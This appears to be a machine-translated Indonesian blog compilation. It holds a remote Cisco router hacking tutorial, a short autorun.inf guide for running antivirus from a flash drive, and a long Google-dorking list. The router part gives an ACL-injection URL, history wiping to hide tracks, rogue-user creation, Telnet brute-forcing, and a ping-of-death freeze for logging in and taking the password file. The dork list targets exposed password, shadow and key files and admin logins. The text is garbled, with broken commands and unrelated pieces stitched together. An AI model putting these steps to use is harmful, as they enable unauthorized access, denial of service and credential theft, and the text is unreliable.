Ada cara dengan mana Anda dapat dengan mudah mereset password router tapi perlu akses fisik. Jadi kita tidak akan membahas itu. Hal ini pada dasarnya dilakukan dengan menggunakan mode Rommn dari router.
Kami akan membahas cara-cara remote untuk memecahkan password.
Sekarang dalam kasus password teks yang jelas Anda tidak perlu untuk memecahkan apa-apa karena password dalam teks yang jelas sudah. lol ;-)
Dalam kasus Vigenere password tidak dienkripsi sehingga sangat dapat retak dengan mudah dengan alat yang dikenal sebagai GetPass. Dalam alat ini Anda memasukkan password terenkripsi dan akan kembali Anda password teks yang jelas.
sekarang dalam kasus MD5 itu adalah kerja yang sibuk. MD5 adalah salah satu cara hash sehingga sulit untuk retak.
Jadi kita melakukan dictionary attack atau serangan brute force pada password ini dengan menggunakan alat seperti
Cain & Abel.
Bagaimana selama mungkin tidak mungkin untuk login ke router bahkan jika Anda memiliki mandat login jika ACL dikonfigurasi di router. Mungkin ada kemungkinan bahwa ACL adalah mencegah akses kami ke router. Jadi kita dapat membuat ACL untuk memberikan kita akses ke router. Kita dapat menggunakan perintah berikut. Ketik perintah berikut sebagai URL:
http://10.0.0.1/level/99/configure/access-list/100/permit/ip/host/10.0.0.2/any/CR
Sekarang dalam perintah di atas adalah IP 10.0.0.1 dan 10.0.0.2 router adalah IP kita. Anda perlu mengganti 10.0.0.2 dengan alamat IP mesin Anda.
Sekarang karena kami sudah mendapat akses untuk login di router. Jadi apa yang harus dilakukan setelah Anda punya akses ke router? Sekarang kita akan membahas beberapa percobaan yang dapat anda lakukan pada perangkat yang kuat.
1. Nonaktifkan Sejarah:
Satu bisa tahu perintah apa yang telah diketik pada router CLI dengan menggunakan perintah show sejarah. Jadi kita perlu menonaktifkan sejarah. Sejarah bisa dinonaktifkan dengan menggunakan perintah berikut pada mode hak istimewa router:
sejarah terminal ukuran nol
2. Cracking Account pengguna:
Beberapa kali ada akun pengguna pada router juga. Hal ini dapat dilihat dari file konfigurasi. Sebagai contoh di file konfigurasi di atas kita melihat sebuah user bernama crypt0 dan password account-nya. Sekarang tergantung pada teknik enkripsi yang digunakan untuk mengenkripsi password kita dapat memecahkan sandi. Jika Vigenere kita dapat menggunakan alat GetPass untuk mendapatkan password teks yang jelas dan jika itu adalah MD5 kita dapat menggunakan alat seperti Kain & Mampu untuk memecahkan password dari account itu dan kemudian kita dapat mengubah password dari akun itu juga. ;-) Kami juga dapat membuat pengguna lain pada router itu.
Perintah berikut ini digunakan untuk membuat user baru. Hal ini diketik dari mode global router:
nama pengguna kata sandi kripto tes
Berikut kripto adalah username dan tes adalah password.
Dalam rangka untuk menghapus menggunakan account perintah berikut dalam mode global router:
tidak ada username kripto
Berikut kripto adalah username yang ingin Anda hapus.
3. Memaksa brute-Layanan Login:
Layanan Login brute-memaksa seperti Telnet dan SSH dapat agak sulit dan sering ribut, tetapi juga dapat menghasilkan hasil yang positif bagi penyerang. Salah satu hal pertama yang harus dilakukan sebelum melakukan jenis serangan pada router adalah untuk menentukan apakah atau tidak router menggunakan beberapa jenis otentikasi diperpanjang seperti Tacacs atau Radius. Meskipun IOS tidak memiliki sarana native mengunci pengguna setelah X jumlah usaha login, lockouts dapat diaktifkan ketika otentikasi dilewatkan ke sistem lain melalui Tacacs atau Radius. Cara termudah untuk mengetahui apakah otentikasi sedang dilewatkan ke sistem lain adalah hanya terhubung ke router menggunakan klien Telnet standar.
C: \> telnet 10.0.0.1
Mencoba 10.0.0.1 ...
Terhubung ke 10.0.0.1. Escape character is'^]'.
Akses Pengguna Verifikasi
Username:
Jika perangkat meminta username, Anda hampir dapat yakin bahwa itu adalah menggunakan beberapa bentuk otentikasi diperpanjang. Dalam hal ini, Tacacs diimplementasikan dan brute-memaksa akan menjadi lebih sulit, karena penyerang akan harus menebak dua variabel, baik username dan password bukan hanya password. Jika jari berjalan, username dapat dikumpulkan, namun kemungkinan mengunci akun pengguna yang sah mungkin akan menghentikan penyerang besar dari melakukan semacam serangan. Tentu saja, jika Anda memiliki izin untuk menilai situs melalui "apa yang diperlukan" Anda masih mungkin ingin melakukan beberapa brute-memaksa hingga ambang lockout. Jika tidak diperpanjang maka hanya otentikasi password akan ditanyakan. Jika ditentukan bahwa otorisasi diperpanjang tidak digunakan, maka penyerang dapat brute force Telnet daemon. Brutus adalah alat berbasis Windows kasar-memaksa yang melakukan sejumlah protokol yang berbeda, dan dapat disesuaikan untuk protokol baru on the fly. THC itu hydra juga yang sangat baik, berbasis Unix alat yang sangat mampu brute memaksa sejumlah layanan yang berbeda.
Lama Teknik router hack:
Router Cisco v4.1 menjalankan perangkat lunak akan mudah dinonaktifkan. Anda hanya terhubung ke router pada port 23 melalui server proxy Anda, dan masukkan string password yang BESAR, sesuatu seperti:
10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv
019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgz
mxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalsk
djfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeiru
tyalskdjfhgzmxncbv019dsk
Sekarang tunggu, sistem cisco mungkin reboot, dalam hal ini Anda tidak dapat hack karena sedang offline. Tapi itu mungkin akan membeku selama 2-10 menit, yang harus Anda gunakan untuk mendapatkan masuk Jika tidak terjadi, maka tidak menjalankan perangkat lunak yang rentan, dalam hal ini Anda dapat mencoba beberapa serangan DoS, seperti ping besar .
Pergi ke dos dan ketik:
ping-l 65550-t 10.0.0.1
di sini 10.0.0.1 adalah ip router, ganti dengan ip router yang sebenarnya di mana Anda melakukan serangan. Ini akan melakukan trik yang sama untuk Anda.
Sementara itu masih beku, buka koneksi lain untuk itu dari beberapa proxy lain, dan menempatkan password sebagai "admin", alasan untuk ini adalah karena secara default, ini adalah password router, dan sementara
itu dinonaktifkan sementara, maka akan kembali ke keadaan default.
Sekarang bahwa Anda telah login, Anda harus mendapatkan file password! Sistem menjalankan perangkat lunak yang berbeda, tetapi kebanyakan akan memiliki prompt seperti "HTL-tekstil" sesuatu atau, sekarang ketik "?" untuk daftar
perintah, Anda akan melihat daftar besar perintah, suatu tempat di sana Anda akan menemukan perintah transfer, gunakan itu untuk mendapatkan password file dari admin (yang merupakan pengguna saat ini) dan kirimkan ke alamat IP Anda sendiri pada port 23. Tapi sebelum Anda melakukan ini, menyiapkan HyperTerminal untuk menunggu panggilan dari router cisco. Sekarang setelah Anda mengirim file, HyperTerminal akan menanyakan apakah Anda ingin menerima file yang mesin ini mengirimkan Anda, katakan ya dan simpan ke disk.
Sekarang bahwa Anda telah memperoleh file password, anda harus menghancurkan sehingga Anda dapat mengakses router lagi. Untuk melakukan ini, Anda dapat menjalankan program seperti John the Ripper atau Cain & Able pada file password, dan Anda dapat memecahkannya
Cara membuat antivirus di Flashdisk
Cara membuat antivirus di Flashdisk
Pertama-tama buatlah AUTORUN untuk menjalangkan antivirus pada flashdisk, caranya copy
antivirus yg berukurang kecil ke flashdisk kita contonya SMADAV,ANSAV….dll (dicontoh kali ini saya menggunakan SMADAV karena ukurangnya kecil sekitar 3 MB). Sekarang kita membuat script / kode di notepad
============potong disini============
[AUTORUN]
open=nama antivirus.exe
shellexecute=nama antivirus.exe
shell\Scan Virus dulu coy:-)_!!!\command=nama antivirus.exe
shell=Scan Virus dulu coy:-)_!!!
============potong disini============
Kemuadian save dengan nama “autorun.inf” (tidak memakai tanda kutip) di flashdisk kita sekarang kita copy saja antivirusnya ke flashdisk (ingat kalau ngopy file autorun dan antivirusnya bukan di dalam folder, ). Kalau akan mengadakan scan tinggal di double klik saja pada drive flashdisk dan kalau kita akan membuka flashdisk, klik kanan dan pilih open
Diatas kata auto play kita juga dapat menambahkan kata-kata perintah yang berisi mengaktifkan antivirus di flashdisk kita.dengan format di notepad:
———————————-
- shell\kata anda\command=(nama antivirus.exe)
- shell=(kata anda)
———————————-
Untuk menghilangkan file AUTORUN di flashdisk , kita harus klik kanan dan pilih properties kemudian klik hidden. Atau dengan cara :
- buka RUN dari start menu
- terus ketik cmd
- Kemudian kita masuk kedalam drive fdnya (biasanya di drive f:)
- Setelah kita tulis commandnya.
f:\>attrib +h +s nama antivirusnya.exe (buat sembunyiin antivirusnya)
f:\>attrib +h +s autorun.inf (buat hidden file autorunnya)
Catatan :
jangan di simpan di dalam folder tapi kalu akan di simpan didalam folder ini scripnya
contoh nama foldernya :Smadav
lalu nama anti virusnya : SMARTP.exe
——————————————————-
[AUTORUN]
open=Smadav/SMARTP.exe
shellexecute=Smadav/SMARTP.exe
shell\Scan Virus dulu coy:-)_!!!\command=Smadav/SMARTP.exe
shell=Scan Virus dulu coy:-)_!!!
——————————————————–
lalu save dengan nama autorun.inf
tambahan kalau akan mengganti icon flashdisknya anda ini caranya
contoh nama icon : icone.ico
——————————————————–
[AUTORUN]
open=Smadav/SMARTP.exe
shellexecute=Smadav/SMARTP.exe
shell\Scan Virus dulu coy:-)_!!!\command=Smadav/SMARTP.exe
shell=Scan Virus dulu coy:-)_!!!
icon=icone.ico
——————————————————–
kembali save dengan nama autorun.inf
CARA HACK GOOGLE's
Hacker Google adalah teknik di mana kita membuat query yang kompleks di Google dalam rangka untuk mengekstrak informasi yang dapat kita gunakan untuk hack situs dan hal-hal banyak lagi. Google teknik hacking tidak hack sebuah website, tetapi memberikan informasi yang assisst dalam hacking. Informasi ini tidak tersedia dengan membuat query sederhana di google.
Banyak orang misconsideration bahwa dalam teknik ini kita hack google.com, ini tidak benar kita tidak hack google.com, tidak ada yang melakukan (setelah semua itu adalah mesin pencari besar ;-))
Sebelum mencoba tangan ur pada hacking google saya ingin u untuk mengurus beberapa tips.
1. Jangan menggunakan Google chrome untuk hacking google.
2. Buka google.com sekarang jika u lihat email id ur di sudut kanan atas browser ur kemudian sign out terlebih dahulu sebelum melakukan hack google.
3. Setiap website tidak rentan terhadap hacking google.
4. "|" Yang digunakan dalam berarti google hack ATAU.
Jadi sekarang bagaimana membuat query yang kompleks. Pertanyaan kompleks yang dibuat dengan menggunakan operator google dan inovasi ur. Ada beberapa operator masing-masing memiliki fungsi yang berbeda dan memberikan hasil yang berbeda bila digunakan dalam query pencarian google. Tapi itu tergantung pada daya pikir ur yang bagaimana u membuat query untuk menemukan hasil yang spesifik. Anda juga dapat menggunakan lebih dari satu operator di time.Lets mulai dengan semua operator 1 dengan 1.
1. Operator Situs:
Operator ini pada dasarnya digunakan untuk mencari informasi dasar tentang sebuah situs target.
ketik di google berikut:
situs: alamat website
Berikut adalah contoh untuk bagaimana menggunakannya:
jenis situs: yahoo.com di google dan lihat hasilnya. Anda sekarang dapat melihat semua domain lain dari yahoo.com. Anda dapat menggunakan situs manapun bukan yahoo.com
Howover u mungkin berpikir informasi ini sangat umum. Tapi hacker uasually menggunakan informasi ini untuk mempelajari semua link dari sebuah situs.
Sebuah waktu yang lama sebelum saya mencoba situs: hotmail.com dalam query google dan saya mendapat begitu hanya 2 link dalam hasil. Dan u mungkin tidak percaya bahwa ketika saya memeriksa url yang mereka berisi username dan password. Tapi ketika saya mencoba untuk login account mereka hanya gagal.
2. intitle: index.of
Operator ini menyediakan daftar direktori universal. Ia bekerja paling di server berbasis apache.
untuk jenis follwoing di google:
intitle: index.of
Anda juga dapat menggunakannya untuk situs web tertentu seperti sebagai berikut:
site: yahoo.com intitle: index.of
situs: naukri.com intitle: index.of
3. Kesalahan | Peringatan
Operator ini dapat mengungkapkan informasi Gr8 tentang Operator target.This memberikan informasi yang berkaitan dengan kesalahan yang telah terjadi pada sebuah situs web. Hal ini dapat mengungkapkan aplikasi yang digunakan, dll OS web server. Berikut ini harus dimasukkan di google:
intitle: kesalahan | peringatan
atau coba ini
intitle: index.of intitle: error
misalnya masukkan berikut di google dan tekan enter untuk melihat hasilnya:
intitle: kesalahan
4. login | logon
Operator ini dapat mengungkapkan informasi mengenai proses login. Operator ini juga dapat mengungkapkan informasi yang berisi alamat email, nomor telepon atau URL asisten manusia yang dapat membantu yang kesulitan karena kehilangan password. Ini membantu orang Asisten meja adalah target sempurna Social Engineering. Ketik berikut di google:
login | logon
misalnya masukkan berikut di google dan pencarian.
situs: login kreeda.com | logon
5. Username | userid | employe.id | username Anda
Operator ini dapat digunakan untuk mendapatkan username dari sasaran. Anda sholud menggunakan "username Anda adalah" string dengan operator yang intext. seperti intext: "uesrname Anda adalah"
Masukkan kode follwoing di Google:
Username | userid | employee.id | username Anda
jika u mendapatkan username maka u dapat mencoba untuk mendapatkan password dari situs tersebut.
misalnya masukkan kode berikut untuk melihat dalam hasil u bisa mendapatkan username dari beberapa orang:
situs: username myspace.com | userid | employee.id | username Anda
atau
site: myspace.com intext: nama pengguna | userid | employee.id | username Anda
6. sandi | kode | passkey | kunci | pwd | password anda
Operator ini dapat digunakan untuk mengungkapkan password dari sebuah situs web. Hal ini juga bisa mengungkapkan prosedur otentikasi login. Query ini harus digunakan dengan operator situs untuk hasil tertentu.
Masukkan follwoing di google:
sandi | kode | kunci | pwd | password anda
7. admin | Administrator
Operator ini bisa mendapatkan informasi tentang admin website. Namun operator ini memberikan hasil irrevelant banyak juga. Banyak kali ketika kesalahan terjadi kita disediakan dengan pesan menghubungi administrator o. Jadi query ini juga dapat menyebabkan hasil u juga seperti.
followng ketik di google:
admin | Administrator
8. admin logon
Operator ini dapat mengungkapkan halaman login admin yang adalah halaman di mana sebuah situs web login admin.
Namun operator ini harus digunakan bersama dengan operator inurl untuk hasil yang lebih baik. seperti
inurl: admin logon
Jika u mendapatkan password admin maka u dapat memiliki sebuah situs.
9. -Ext atau filetype:
Operator ini mirip dengan operator filetype: Kedua operator dapat digunakan untuk mendapatkan file os tertentu format-ext merupakan sinonim dari filetype: operator. -Ext-ve adalah operator yang berarti wont memberikan hasil apapun jika digunakan sendiri. Jadi gunakan dengan situs: operator seperti: situs: situs nama-ext: pdf
Dalam kasus filetype: operator. Untuk misalnya. jika u ingin mendapatkan file format pdf kemudian ketik follwoing di google:
filetype: pdf
Ini akan memberikan u semua file pdf. tapi jika u ingin file pdf tertentu seperti crypto.pdf kemudian coba berikut
kode di google:
intext: kripto filetype: pdf
Operator ini sangat penting jika u sedang mencari beberapa file specfic di internet. misalnya. Misalkan u ingin crypto.mp3 file bernama dari www.songslover.com situs web tertentu maka dalam rangka untuk menemukan file jenis seperti u harus ketik kode follwoing:
situs: songslover.com intext: kripto filetype: mp3
Operator ini dapat digunakan untuk pencarian buku, software, lagu, video, game dll
coba ini:
filetype: pdf intext: Hacking
Filetype: Operator juga dapat digunakan untuk mendapatkan password. Misalnya kita dapat mencari file registry tertentu yang dapat berisi sandi. Sandi biasanya dalam bentuk terenkripsi atau dalam heksadesimal.
ketik berikut di google:
filetype: reg intext: "internet account manager"
sama u dapat mengekstrak password dari mdb,.. pwd dan file database lain ekstensi.
coba ini:
filetype: pwd intext: "password" | "sandi"
coba ini:
filetype: pwd inurl: _vti_pvt inurl: penulis | administrator
10. inurl: temp | inurl: tmp | inurl: backup | inurl: bak
Operator ini pada dasarnya pencarian untuk file cadangan di internet. Operator ini harus digunakan dengan situs: operator dalam rangka untuk menemukan file temperory atau cadangan dari situs web target. File-file dan file cadangan temperory dapat berisi informasi sensitif.
Query di atas juga dapat ditulis sebagai inurl: temp | temperory | bak | cadangan
tapi ingat ketika kita menggunakan banyak OR yang adalah "|" dalam permintaan kita maka kita tidak mendapatkan hasil yang lebih baik.
11. inurl:
Operator ini juga merupakan salah satu sangat berguna. Misalkan u ingin mendapatkan nama-nama website yang berisi kata tertentu. Kemudian gunakan operator ini untuk assisst u. ketik saja di google follwoing:
inurl: kata kunci
di sini kata kunci adalah kata yang u inginkan di url web atau misalnya address.for. jika saya masukkan berikut di google:
inurl: crypto36
Anda dapat melihat URL yang memberikan milik blogspot saya ...!!!
Ingat:
1. Hindari menggunakan banyak "|" dalam query.
2. Hacking google tergantung pada daya pikir ur & inovasi. Anda dapat membuat query ur sendiri
dengan menggunakan operator yang berbeda.
3. Setiap website tidak rentan terhadap hacking google. Besause kesadaran hacking google
banyak situs sudah mulai menghindari halaman khusus mereka untuk ditampilkan dalam hasil google.
Sebagai contoh seperti yang saya bilang u sebelum kasus situs: hotmail.com, sekarang u wont menemukan bahwa hasil bahwa saya melihat
tahun yang lalu.
Berikut adalah beberapa query lagi yang dapat Anda coba. Ketik di google query berikut dan lihat hasilnya:
account admin info "filetype: log
Host =*.* intext:! Enc_UserPassword =* ext: PCF
"#-FrontPage-" ext: pwd inurl: (layanan | penulis | administrator | pengguna) "#-FrontPage-" inurl: service.pwd
"AutoCreate password = BENAR =*"
"Http:// *: * @ www" domainname
"Index of /" "" "parent directory" ws_ftp.ini
"Liveice file konfigurasi" ext: cfg-site: sourceforge.net
"Parent directory" + proftpdpasswd
Duclassified "-site: duware.com" DUware All Rights reserved "
duclassmate "-site: duware.com
Dudirectory "-site: duware.com
dudownload "-site: duware.com
Elite Forum Versi *.* "
Departemen tautan "
"Set mode: + k"
"Anda adalah password" filetype: log
DUpaypal "-site: duware.com
allinurl: admin mdb
auth_user_file.txt
config.php
eggdrop filetype: user pengguna
mengaktifkan password | rahasia "konfigurasi saat ini"-intext: yang
dll (index.of)
ext: asa | ext: bak intext: uid intext: pwd - "uid .. pwd" database | server | dsn
ext: inc "pwd =" "UID ="
ext: eudora.ini ini
ext: Versi ini = 4.0.0.4 sandi
ext: passwd-intext: the-sample-contoh
ext: txt inurl: unattend.txt
ext: yml database yang inurl: config
filetype: bak CreateObject sa
filetype: bak inurl: "htaccess | passwd | shadow | htusers"
filetype: cfg mrtg "target
filetype: cfm "cfapplication nama" sandi
filetype: conf oekakibbs
filetype: conf slapd.conf
filetype: config config intext: appSettings "User ID"
filetype: dat "password.dat"
filetype: dat inurl: Sites.dat
filetype: dat wand.dat
filetype: inc dbconn
filetype: inc intext: mysql_connect
filetype: inc mysql_connect ATAU mysql_pconnect
filetype: inf Sysprep
filetype: inurl ini: "serv-u.ini"
filetype: inurl ini: flashFXP.ini
filetype: ServUDaemon ini
filetype: wcx_ftp ini
filetype: ini WS_FTP pwd
filetype: ldb admin
filetype: log "Lihat` ipsec-hak cipta "
filetype: log inurl: "password.log"
filetype: mdb inurl: users.mdb
filetype: mdb wwforum
filetype: Netrc sandi
filetype: lulus lulus intext: userid
filetype: pem intext: swasta
filetype: sifat inurl: db intext: password
filetype: pwd layanan
filetype: PWL PWL
filetype: reg reg + intext: "DefaultUserName" + intext: "DefaultPassword"
filetype: reg reg + intext: Ã ¢? WINVNC3Ã ¢?
filetype: reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype: sql "masukkan ke" (pass | passwd | password)
filetype: sql ("nilai-nilai * MD5 |?" nilai-nilai * password "|" nilai-nilai * mengenkripsi ")
filetype: sql + "diidentifikasi oleh"-cvs
filetype: sql sandi
filetype: url + inurl: "ftp://" + inurl :";@"
filetype: xls username email sandi
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext: "memungkinkan sandi 7?
intext: "enable secret 5 $"
intext: "EZGuestbook"
intext: "Web Wiz Journal"
intitle: "index of" intext: connect.inc
intitle: "index of" intext: globals.inc
intitle: "Index of" password diubah
intitle: "Index of" sc_serv sc_serv.conf konten
intitle: "phpinfo ()" + "mysql.default_password" + "ri Zend s ting Bahasa Mesin??"
intitle: dupics inurl: (add.asp | default.asp | view.asp | voting.asp)-situs: duware.com
intitle: index.of administrators.pwd
intitle: Index.of etc shadow
intitle: index.of intext: "secring.skr" | "secring.pgp" | "secring.bak"
intitle: rapidshare intext: login
inurl: "?? kalender ri t / users.txt"
inurl: "editor / list.asp" | inurl: "database_editor.asp" | inurl: "login.asa" "diatur"
inurl: "GRC.DAT" intext: "password"
inurl: "Sites.dat" + "LULUS ="
inurl: "slapd.conf" intext: "kredensial"-manual - "Halaman Manual"-manusia:-sampel
inurl: "slapd.conf" intext: "rootpw"-manual - "Halaman Manual"-manusia:-sampel
inurl: "wvdial.conf" intext: "password"
inurl: / db / main.mdb
inurl: / WWWboard
inurl: / yabb / Anggota / Admin.dat
inurl: ccbill filetype: log
inurl: cgi-bin inurl: calendar.cfg
inurl: chap-secrets-cvs
inurl: config.php dbuname dbpass
inurl: filezilla.xml-cvs
inurl: filetype lilo.conf: conf sandi-tatercounter2000-bootpwd-man
inurl: nuke filetype: sql
inurl: intext ospfd.conf: password-sample-test-tutorial-download
inurl: pap-secrets-cvs
inurl: pass.dat
inurl: melakukan filetype: ini
inurl: perform.ini filetype: ini
inurl: secring ext: skr | ext: pgp | ext: bak
inurl: server.cfg rcon sandi
inurl: ventrilo_srv.ini adminpassword
inurl: vtund.conf intext: pass-cvs
inurl: zebra.conf intext: password-sample-test-tutorial-download
LeapFTP intitle: ". Index.of /" sites.ini diubah
master.passwd
mysql sejarah file
NickServ pendaftaran password
passlist
passlist.txt (cara yang lebih baik)
passwd
passwd / etc (dapat diandalkan)
people.lst
file konfigurasi psyBNC
pwd.db
server DBS "intitle: index of"
signin filetype: url
spwd.db / passwd
trillian.ini
WWWboard WebAdmin inurl: passwd.txt WWWboard | webadmin
[WFClient] Password = filetype: ica
intitle: "penilaian remote" Konsol OpenAanval
intitle: opengroupware.org "resistensi adalah usang" "Bugs Report" "Username" "sandi"
"Bp admin blog" intitle: login | intitle: admin-situs: johnny.ihackstuff.com
"Emergisoft aplikasi web adalah bagian dari kita"
"Membangun Lights Out Terpadu aman sesi dengan" ATAU intitle: "Frame data - Browser tidak HTTP 1.1 kompatibel" ATAU intitle: "HP Terpadu Lampu-
"HostingAccelerator" intitle: "login" + "Username" - "berita"-demo
"ICONECT 4.1:: Login"
"Imail Pesan Web Server" intitle: login
"Inspanel" intitle: "login" - "tidak bisa" "Login ID"-site: inspediumsoft.com
"Intitle: 3300 Komunikasi Terpadu Platform" inurl: main.htm
"Masuk - Sun Cobalt Raq"
"Prompt login" inurl: GM.cgi
"Login ke Usermin" inurl: 20000
"Microsoft CRM: Versi Browser tidak didukung"
"OPENSRS Domain Manajemen" inurl: manage.cgi
"PcAnyWhere EXPRESS Jawa Klien"
"Silakan otentikasi diri Anda untuk mendapatkan akses ke antarmuka manajemen"
"Silakan log in"
"Silahkan login dengan lulus admin" - "kebocoran"-sourceforge
CuteNews "" 2003 .. 2005 CutePHP "
DWMail "sandi intitle: dwmail
Merak Mail Server Software "-. -. gov juta -. edu-situs: merakmailserver.com
Midmart Messageboard "" Administrator Login "
Daftar Top Rakasa "MTL numrange: 200 -
UebiMiau "-site: sourceforge.net
"Situs info untuk" "Masukkan Password Admin"
"SquirrelMail versi" "Dengan Tim pengembangan SquirrelMail"
"SysCP - login"
"Ini adalah Server Pembatasan akses" "Javas ri t Tidak Diaktifkan??!" | "Messenger Ekspres"-edu-ac
"Bagian ini adalah untuk Administrator saja. Jika Anda seorang administrator maka silakan "
"Ttawlogin.cgi /? Action ="
"VHC Pro ver"-demo
"VNC Desktop" inurl: 5800
"Manajemen Berbasis Web" "Silakan masukan password untuk login"-inurl: johnny.ihackstuff.com
"WebExplorer Server - Masuk" "Selamat Datang WebExplorer Server"
"WebSTAR Mail - Silakan Log In"
"Anda telah meminta akses ke area terbatas dari website kami. Silahkan mengotentikasi diri untuk terus. "
"Anda telah meminta untuk mengakses fungsi-fungsi manajemen" -. edu
(Intitle: "Silahkan login - Forum
UBB.threads ") | (inurl: login.php" UBB ")
(Intitle: "Silahkan login - Forum
WWWThreads ") | (inurl:" wwwthreads / login.php ") | (inurl:"? Wwwthreads / login.pl Cat = ")
(Intitle: "rymo Login") | (intext: "Selamat Datang rymo")-keluarga
(Intitle: "WmSC e-Cart Administrasi") | (intitle: "WebMyStyle e-Cart Administrasi")
(Inurl: "ars / cgi-bin / arweb O = 0 | inurl:?? Arweb.jsp)-situs: remedy.com-site: mil
4images Administrasi Control Panel
allintitle: "Selamat datang di Cyclades"
allinurl: "pertukaran / logon.asp"
allinurl: wps / portal / login
ASP.login_aspx "ASP.NET_SessionId"
CGI: IRC Login
ext: cgi intitle: "panel kontrol" "masukkan password pemilik Anda untuk melanjutkan"!
ez Publish administrasi
filetype: php inurl: "webeditor.php"
filetype: pl "Download: SuSE Linux Openexchange Server CA"
filetype: r2w r2w
intext: ""? BiTBOARD v2.0 BiTSHiFTERS Bulletin Board "
intext: "Isilah formulir di bawah ini benar-benar untuk mengubah password Anda dan nama pengguna. Jika nama pengguna baru dibiarkan kosong, yang lama Anda akan diasumsikan. "Edu-
intext: "admin login di sini Mail untuk administrate domain Anda."
intext: "Guru Akun" "Nama Domain" "Password" inurl: / cgi-bin/qmailadmin
intext: "Guru Akun" "Nama Domain" "Password" inurl: / cgi-bin/qmailadmin
intext: "Manajemen Penyimpanan Server untuk" intitle: "Administrasi Server"
intext: "Selamat Datang" inurl: "cp" intitle: "H-SPHERE" inurl: "begin.html"-Fee
intext: "vBulletin" inurl: AdminCP
intitle: "*- HP WBEM Login" | "Anda sedang diminta untuk memberikan informasi account login untuk *" | "Harap memberikan informasi yang diminta dan tekan
intitle: "Admin Login" "admin login" "blogware"
intitle: "Admin Login" "Administrasi Situs Web" "Hak Cipta"
intitle: "Desktop AlternC"
intitle: "Titik Otentikasi Athena"
intitle: "b2evo> Login bentuk" "bentuk Login. Anda harus log in! Anda harus menerima cookie untuk log in "-situs demo-: b2evolution.net
intitle: "Cisco CallManager Pilihan Pengguna Log On" "Silakan masukkan User ID dan Password Anda di tempat yang disediakan di bawah ini dan klik Log tombol On untuk bersama
intitle: "ColdFusion Administrator Login"
intitle: "communigate pro * *" intitle: "pintu masuk"
intitle: "Content Management System" "nama pengguna" | "password" | "admin" "Microsoft IE 5.5? -Mambo
intitle: "Content Management System" "nama pengguna" | "password" | "admin" "Microsoft IE 5.5? -Mambo
intitle: "Pengawas Dell Remote Access"
intitle: "Docutek eres - Admin Login"-edu
intitle: "Karyawan Intranet Login"
intitle: "emule *" intitle: "- Web Control Panel" intext:. "Web Control Panel" "Masukkan sandi di sini"
intitle: "Masuk ePowerSwitch"
intitle: "ada Administrasi Database"-demo
intitle: "Extranet * - Identifikasi"
intitle: "Extranet login" -. edu -. -. mil pemerintah
intitle: "EZPartner"-netpond
intitle: "Flash Operator Panel"-ext: php-wiki-cms-inurl: asternic-inurl: sip-intitle: MENGUMUMKAN-inurl: daftar
intitle: "i-aman v1.1? -Edu
intitle: "Icecast Administrasi Halaman Admin"
intitle: "iDevAffiliate - admin"-demo
intitle: "ISPMan: Akses tidak sah dilarang"
intitle: "Sistem Informasi ITS" "Harap masuk ke sistem SAP"
intitle: "Kurant Korporasi StoreSense" filetype: bok
intitle: "ListMail Login" admin-demo
intitle: "Masuk -
Easy File Sharing Web Server "
intitle: "Forum Login
AnyBoard "intitle:" Jika Anda adalah pengguna baru: "intext:" Forum
AnyBoard "inurl: gochat-edu
intitle: "Login ke @ Mail" (ext: pl | inurl: "index")-dwaffleman
intitle: "Login ke Cacti"
intitle: "Masuk ke forum - @ www.aimoo.com" inurl: login.cfm id =?
intitle: "Masuk mailman"
intitle: "Member Login" "CATATAN: Browser Anda harus mengaktifkan cookies untuk dapat login ke situs" ext:. php ATAU ext: cgi
intitle: "Merak Mail Server Web Administrasi"-ihackstuff.com
intitle: "microsoft sertifikat layanan" inurl: certsrv
intitle: "MikroTik RouterOS Mengelola Halaman Web"
intitle: "MX Konsol Kontrol" "Jika Anda tidak ingat"
intitle: "Novell Web Services" "GroupWise"-inurl: "doc/11924? -. Mil -. -. edu pemerintah-filetype: pdf
intitle: "Novell Web Services" intext: ". Pilih layanan dan bahasa"
intitle: "oMail-admin Administrasi - Login"-inurl: omnis.ch
intitle: "Rekrutmen Program OnLine - Login"
intitle:? "Philex 0,2 *"-s ri t-situs:? freelists.org
intitle: "PHP Lanjutan Transfer" inurl: "login.php"
intitle: "php iCalendar administrasi"-site: sourceforge.net
intitle: "php iCalendar administrasi"-site: sourceforge.net
intitle: "phpPgAdmin - Login" Bahasa
intitle: "PHProjekt - login" password login
intitle: "silahkan login" "password Anda adalah *"
intitle: "Web Desktop Connection Remote" inurl: tsweb
intitle: "SFXAdmin - sfx_global" | intitle: "SFXAdmin - sfx_local" | intitle: "SFXAdmin - sfx_test"
intitle: "SHOUTcast Administrator" inurl: admin.cgi
intitle: "administrasi situs: silakan log in" "situs yang dirancang oleh emarketsouth"
intitle: "Supero Dokter III"-inurl: Supermicro
intitle: "SuSE Linux Openexchange Server" "Silahkan aktifkan Javas ri t!"??
intitle: "TeamSpeak server-administrasi
intitle: "Administrasi Server Tomcat"
intitle: "TOPdesk ApplicationServer"
intitle: "Masuk TUTOS"
intitle: "ranting Login"
intitle: "vhost" intext: "vhost. 2000-2004?
intitle: "Virtual Server Sistem Administrasi"
intitle: "WebMail VisNetic" inurl: "/ mail /"
intitle: "Sistem VitalQIP IP Manajemen"
intitle: "VMware Manajemen Antarmuka:" inurl: "vmware / en /"
intitle: "VNC viewer untuk Java"
intitle: "Web-cyradm" | "oleh Luc Louw de" "ini hanya untuk pengguna yang berwenang"-tar-site: web cyradm.org
intitle: "WebLogic Server" intitle: "Konsol Login" inurl: konsol
intitle: "Selamat datang di Situs / Pengguna Administrator" "Silakan pilih bahasa"-demo
intitle: "Selamat Datang Mailtraq WebMail"
intitle: "selamat datang netware *"-site: novell.com
intitle: "WorldClient" intext: "? (2003 | 2004). Alt-N Technologies "
intitle: "xams 0.0.0 .. 15 - Login"
intitle: "XcAuctionLite" | "Didorong oleh XCENT" Lite inurl: admin
intitle: "XMail Web Administrasi Interface" intext: Masuk intext: password
intitle: "Zope Bantuan Sistem" inurl: HelpSys
intitle: "ZyXEL Prestige Router" "Masukkan sandi"
intitle: "inc. 3000 vpn konsentrator "
